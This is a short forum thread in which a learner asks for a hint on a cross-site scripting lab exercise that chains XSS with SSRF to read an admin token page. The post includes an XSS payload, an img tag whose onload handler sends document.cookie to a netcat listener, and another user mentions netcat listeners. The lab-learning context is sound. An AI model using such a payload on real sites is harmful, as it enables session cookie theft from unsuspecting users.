Forum Discussion
shubham
Bronze I
Bronze ICross-Site Scripting: Ep.6 – Further Exploitation
I was stuck in one question looking for HINT. Extend the XSS vulnerability to view the contents of the /admin/token page with SSRF.
johndoe321I changed the script to a different port to the one being bombarded and did another NC listener on that different port. Roled right in.
KieranRowley
Community Manager
Community ManagerHi shubham welcome to The Human Connection!
Please can you provide some detail of the steps you have already taken so that your fellow community members are able to assist you?
shubhamBronze I
Bronze IThanks for welcome.
So I tire using netcat with the payload in message to make a reverse connection
Payload:<img src=xss onload="this.src='http://10.102.181.168:5556/admin/token?'+document.cookie;this.removeAttribute('onerror');"/>
